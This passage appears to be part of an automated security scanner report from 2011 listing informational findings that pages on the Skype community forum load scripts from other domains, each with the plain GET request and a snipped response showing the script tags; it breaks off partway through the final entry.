Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/T..picos-Gerais/bd-p/pt_general

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/T..picos-Gerais/bd-p/pt_general HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:47:11 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 187312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.215. http://community.skype.com/t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Welcome-Getting-Started/Welcome-to-the-Skype-Support-Network/m-p/24 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:26 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 70554

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.216. http://community.skype.com/t5/Welcome-Getting-Started/bd-p/Welcome  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/bd-p/Welcome

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Welcome-Getting-Started/bd-p/Welcome HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:26 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 185209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</link>
   

       <script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/C4F18E48D9C0671680CEA3506DCF07B2/lia-scripts-body-min.js"></script>
...[SNIP]...

18.217. http://community.skype.com/t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Welcome-Getting-Started/repeatedly-need-to-select-skype-to-start-it/m-p/134248 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 84536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.218. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Api-access-control-wont-remember/m-p/134242

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 187927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.219. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134210 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.220. http://community.skype.com/t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Creative-Live-inPerson-HD-Skype-5-5-x/m-p/134222 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:53 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 85452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.221. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/46260  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/46260

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/46260 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:16 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 242916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.222. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/47126  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/47126

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/47126 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 242467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.223. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/61276  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/61276

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/61276 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 253940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.224. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:17 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 253971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js"></script>
...[SNIP]...

18.225. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 182796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.226. http://community.skype.com/t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/How-to-mute-all-notifications-in-Skype-without-DO-NOT-DISTURB/m-p/87914 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 87149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.227. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134202  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Install-says-Another-Version-Installed/m-p/134202

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Install-says-Another-Version-Installed/m-p/134202 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:14 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 181624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.228. http://community.skype.com/t5/Windows/Install-says-Another-Version-Installed/m-p/134246  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Install-says-Another-Version-Installed/m-p/134246

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Install-says-Another-Version-Installed/m-p/134246 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:15 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 181269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.229. http://community.skype.com/t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Skype-5-5-High-idle-CPU-usage/m-p/130106 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 142769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</a>
       
       
<script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js"></script>
...[SNIP]...

18.230. http://community.skype.com/t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Windows/Skype-5-5-shows-as-Skype-5-3-0-120-in-quot-About-Skype-quot/m-p/132300 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
